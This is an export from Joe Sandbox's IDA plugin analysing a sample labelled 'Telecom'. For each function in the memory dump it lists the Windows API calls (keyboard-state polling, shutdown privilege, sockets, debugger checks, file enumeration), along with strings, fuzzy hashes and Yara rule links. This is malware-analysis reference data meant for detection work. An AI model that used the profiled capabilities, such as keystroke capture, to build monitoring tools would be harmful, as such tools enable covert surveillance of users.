Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 45345161e4912571a360d381ef9ef8a5b6d42cd22449e203528aeb8812abaf80
Instruction ID: 7b2642e355036597507ab483a5ec822a39f078ca608f0b86bcef390bc8853ac4
Opcode Fuzzy Hash: 45345161e4912571a360d381ef9ef8a5b6d42cd22449e203528aeb8812abaf80
Instruction Fuzzy Hash: E2024D756042009FD754DF24C895F2ABBE5EF89308F1884AEE84ACB362D735EC42CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004AA635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 004AA65D
GetAsyncKeyState.USER32(000000A0), ref: 004AA6DE
GetKeyState.USER32(000000A0), ref: 004AA6F9
GetAsyncKeyState.USER32(000000A1), ref: 004AA713
GetKeyState.USER32(000000A1), ref: 004AA728
GetAsyncKeyState.USER32(00000011), ref: 004AA740
GetKeyState.USER32(00000011), ref: 004AA752
GetAsyncKeyState.USER32(00000012), ref: 004AA76A
GetKeyState.USER32(00000012), ref: 004AA77C
GetAsyncKeyState.USER32(0000005B), ref: 004AA794
GetKeyState.USER32(0000005B), ref: 004AA7A6

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: cb8cd10a3b6a5f8aa751ae29294be73ecd866ce9b9046eb92ca91d013b289534
Instruction ID: 599303cef043d43d8f96212ec5280cd05ed89d6e63bc68d56c12a788762a6d70
Opcode Fuzzy Hash: cb8cd10a3b6a5f8aa751ae29294be73ecd866ce9b9046eb92ca91d013b289534
Instruction Fuzzy Hash: 5F41A4685447C969FF31966084143A7BFB06B33344F48805BD5C64A3C2EB9CD9E8CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 004AF20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004A2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004A205A
Part of subcall function 004A2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004A2087
Part of subcall function 004A2010: GetLastError.KERNEL32 ref: 004A2097

ExitWindowsEx.USER32(?,00000000), ref: 004AF249

Strings

@, xrefs: 004AF23C
, xrefs: 004AF237
, xrefs: 004AF273
SeShutdownPrivilege, xrefs: 004AF219

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 975f045803d822a57ca621480a1368f5c2855f98539bfa408aa89e36c421d446
Instruction ID: b69b0bedc0c571add7de5ac67e13117b6db1cb4d873fd6a4a6cd72634c391841
Opcode Fuzzy Hash: 975f045803d822a57ca621480a1368f5c2855f98539bfa408aa89e36c421d446
Instruction Fuzzy Hash: 2401497BA112106BEB2426F89C8AFBF736C9F2A344F100973FD03E21D1D5695C099198

Uniqueness

Uniqueness Score: -1.00%

Function 004422AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 0044233E
GetSysColor.USER32(0000000F), ref: 00442421
SetBkColor.GDI32(?,00000000), ref: 00442434

Strings

(Q, xrefs: 0044240A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Color$Proc
String ID: (Q
API String ID: 929743424-2768264020
Opcode ID: 9221f7be56ef9e5bb89113ae647158ee7b569c22d641ec23507a9551b4468da1
Instruction ID: a92c9b1a2a87c77cc54b82356754b080b7d77d617bca0132f1b894ce84dc8627
Opcode Fuzzy Hash: 9221f7be56ef9e5bb89113ae647158ee7b569c22d641ec23507a9551b4468da1
Instruction Fuzzy Hash: E58126B0114400BAF2287E398EA9E7F25AEEB42709F51451BF902C6791C9DDCE42937F

Uniqueness

Uniqueness Score: -1.00%

Function 0047E87F Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0047E9C5

Strings

1#IND, xrefs: 0047FBBD
1#SNAN, xrefs: 0047FBC4
1#QNAN, xrefs: 0047FBCB
1#INF, xrefs: 0047FBD2

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: d56c0cbb25d0a6a5af1611df4f851be522d728f88b45fdda6b3ff547098c0555
Instruction ID: d6bce144bf12fe9acf7432718246c9efe43ae2a6b22ffe81ec4445dcdaa69b20
Opcode Fuzzy Hash: d56c0cbb25d0a6a5af1611df4f851be522d728f88b45fdda6b3ff547098c0555
Instruction Fuzzy Hash: BEC24C71E046288FDB25CE28DD407EAB7B5EB48305F1582EBD84DE7240E778AE858F45

Uniqueness

Uniqueness Score: -1.00%

Function 004A20AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004A1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004A1916
Part of subcall function 004A1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004A1922
Part of subcall function 004A1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004A1931
Part of subcall function 004A1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004A1938
Part of subcall function 004A1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004A194E

GetLengthSid.ADVAPI32(?,00000000,004A1C81), ref: 004A20FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004A2107
HeapAlloc.KERNEL32(00000000), ref: 004A210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 004A2127
GetProcessHeap.KERNEL32(00000000,00000000,004A1C81), ref: 004A213B
HeapFree.KERNEL32(00000000), ref: 004A2142

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: f00f588e809106516986af7d8489751699c5ffd579efc9ce99f21e9896f24ac4
Instruction ID: 3984d00ef71e7209e2c5ce61ce92ba1ed15504216753799a3b435513c7dfd376
Opcode Fuzzy Hash: f00f588e809106516986af7d8489751699c5ffd579efc9ce99f21e9896f24ac4
Instruction Fuzzy Hash: 0B110371901204FFDB108F68CD08BEF7BB9EF52355F10802AE98193220C3799900DB68

Uniqueness

Uniqueness Score: -1.00%

Function 004BA570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 004BA5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 004BA6D0

Part of subcall function 004B42B9: GetInputState.USER32 ref: 004B4310
Part of subcall function 004B42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004B43AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 004BA5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 004BA6BA

Strings

*.*, xrefs: 004BA5A2

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 88e401056d6ac548327585d5af0537aad76bd6e82eab38a547fd8cbda813d947
Instruction ID: e7a0c862e25ce92cd9d6571b006c0ab1eedf1936fa5c8961b30e0e9b9a51e885
Opcode Fuzzy Hash: 88e401056d6ac548327585d5af0537aad76bd6e82eab38a547fd8cbda813d947
Instruction Fuzzy Hash: DB4172B1D0020AAFDF14DF65CC49AEEBBB4EF05314F24405BE845A2291EB349E54CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 004C2263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004C3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 004C3AD7
Part of subcall function 004C3AAB: _wcslen.LIBCMT ref: 004C3AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 004C22BA
WSAGetLastError.WSOCK32 ref: 004C22E1
bind.WSOCK32(00000000,?,00000010), ref: 004C2338
WSAGetLastError.WSOCK32 ref: 004C2343
closesocket.WSOCK32(00000000), ref: 004C2372

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 416342c1ee28fd8dbc4dc9c8dc866e9484f4661514659d23bc5e15f343f1d7da
Instruction ID: ba5d8d9316c659e7d1bd85e17fbab76929f9fd7b345c56cfb023dcd68d607035
Opcode Fuzzy Hash: 416342c1ee28fd8dbc4dc9c8dc866e9484f4661514659d23bc5e15f343f1d7da
Instruction Fuzzy Hash: 86510574A00200AFE711AF25C986F2A77E4AB04718F04809EF9059F3D3C7B9AC428BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004D26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 004D275C
IsWindowEnabled.USER32 ref: 004D276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 004D2777
IsIconic.USER32 ref: 004D2785
IsZoomed.USER32 ref: 004D2793

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 499a690f476b630301137116fd8628b23349a8a991a5f8f78f03ba8ca72fac30
Instruction ID: fd903950d4cc0855d35657e5aa18c20edb20f5c7ec82b1d2bbbb4e0572b77641
Opcode Fuzzy Hash: 499a690f476b630301137116fd8628b23349a8a991a5f8f78f03ba8ca72fac30
Instruction Fuzzy Hash: 6E2105357012109FE7219F26C964B1B7BE4BFA5314F19806FE8498B351C7B9EC42CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004A8BFF Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 004A8C11

Strings

|, xrefs: 004A8C41
(, xrefs: 004A8C57
trP, xrefs: 004A8E5B

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: lstrlen
String ID: ($trP$|
API String ID: 1659193697-4102042556
Opcode ID: 48e71c2b732b192b9b96b4cfa872a909b443798431c0312e7cba75c3a17495f0
Instruction ID: d52f0454edf0f8a086146da4dfececfe04ecdc38b9c979f05d78a60124d412bf
Opcode Fuzzy Hash: 48e71c2b732b192b9b96b4cfa872a909b443798431c0312e7cba75c3a17495f0
Instruction Fuzzy Hash: 62325774A007059FDB28CF19C481AAAB7F0FF58320B15C56EE49ADB3A1EB74E941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0049E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0049E5F8

Strings

X64, xrefs: 0049E680
%.3d, xrefs: 0049E603

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: e1979b1566c3b3840fc7885826bae7c5f820c65543acb5602ddf8aab927d3071
Instruction ID: 2298d423d0c30ece74f53aed2043c4439da78673a87045f3f7e3f77059322407
Opcode Fuzzy Hash: e1979b1566c3b3840fc7885826bae7c5f820c65543acb5602ddf8aab927d3071
Instruction Fuzzy Hash: CBD012B1C04108E6CF80D7929D49DB97B7CBB18701F944877F90691041E6289D0A972B

Uniqueness

Uniqueness Score: -1.00%

Function 00472992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00472A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00472A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00472AA1

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: f299353e47caaab447ab987f0967293aa486bbafd3a494d668a7d37e2e75e55e
Instruction ID: 52c4f639ae66717c12a94f6186e279fdeb06b76db386383fb49d8ca07b327684
Opcode Fuzzy Hash: f299353e47caaab447ab987f0967293aa486bbafd3a494d668a7d37e2e75e55e
Instruction Fuzzy Hash: D531D87490121C9BCB21DF68D9887DDBBB8AF18310F5042EAE80CA7250E7749F858F49

Uniqueness

Uniqueness Score: -1.00%

Function 00465058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0046502E,?,005098D8,0000000C,00465185,?,00000002,00000000), ref: 00465079
TerminateProcess.KERNEL32(00000000,?,0046502E,?,005098D8,0000000C,00465185,?,00000002,00000000), ref: 00465080
ExitProcess.KERNEL32 ref: 00465092

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 295a5e44e4b8c4beb36ec4e65e2bab7cb5e760cd713299cdcb7279b8ae078ad5
Instruction ID: f60c672614781a780baa47309b3037d3fbc72039dc44b0ebe77aeb17c529f0be
Opcode Fuzzy Hash: 295a5e44e4b8c4beb36ec4e65e2bab7cb5e760cd713299cdcb7279b8ae078ad5
Instruction Fuzzy Hash: DEE08C31402508AFCF216F54CD08E493B6DEF10385F00402AFC098A231EB39DD42CBC9

Uniqueness

Uniqueness Score: -1.00%

Function 0049E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0049E664

Strings

X64, xrefs: 0049E680

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: f9293a10b12fdeb90b59b23761db4994b3165dcab4dcd85c078858ed74648ee8
Instruction ID: db5e927173f2414531d419b109f337b73c47092e2105c4520870161d06c37666
Opcode Fuzzy Hash: f9293a10b12fdeb90b59b23761db4994b3165dcab4dcd85c078858ed74648ee8
Instruction Fuzzy Hash: 69D0C9F480111DFACF80CB50EC88DD9777CBB04304F100662F506A2000D734964A8B18

Uniqueness

Uniqueness Score: -1.00%

Function 0046CE10 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e524963ce6c68c089666ae95d937acf582a473e3440411cabf52bc31ff7920a
Instruction ID: 9671bd4d31113037605a1fdda62981f1be2bd16a1e32f5c61480646cb2f9d3f3
Opcode Fuzzy Hash: 6e524963ce6c68c089666ae95d937acf582a473e3440411cabf52bc31ff7920a
Instruction Fuzzy Hash: 29024D71E002199BDF14CFA9C9906AEF7F1FF49314F25826AD819E7380E735A941CB85

Uniqueness

Uniqueness Score: -1.00%

Function 004B41FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,004C52EE,?,?,00000035,?), ref: 004B4229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,004C52EE,?,?,00000035,?), ref: 004B4239

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 8599202c8f92918c03d22b8ea3c0797b4216937491f7909f31a32fb18b14ab54
Instruction ID: 406aa215a790cbcdf69ffb936792ca493dc88ebc882bdc71d8889d7489c4ddb1
Opcode Fuzzy Hash: 8599202c8f92918c03d22b8ea3c0797b4216937491f7909f31a32fb18b14ab54
Instruction Fuzzy Hash: DBF0E5306002286AEB202666AC4DFEB766DEFC5765F0001BBF505D3281D9709900C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 0044E1F0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 0049224F

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 574eeab7fc3eaa339ac6f17d2f5f75a57e6548fd9dc73b323e9dfaec2a63ec08
Instruction ID: 82ed73ab1f8ffe68524c5964907bb109a3c959b439ae12266017af174add0ee1
Opcode Fuzzy Hash: 574eeab7fc3eaa339ac6f17d2f5f75a57e6548fd9dc73b323e9dfaec2a63ec08
Instruction Fuzzy Hash: AD32A030900218EBEF14DF95C985AEEB7B4BF15308F54406BE8056B392DB7D9D0ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 00476ADE Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,00476AD9,00000000,?,00000008,?,?,0048027E,00000000), ref: 00476D0B

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

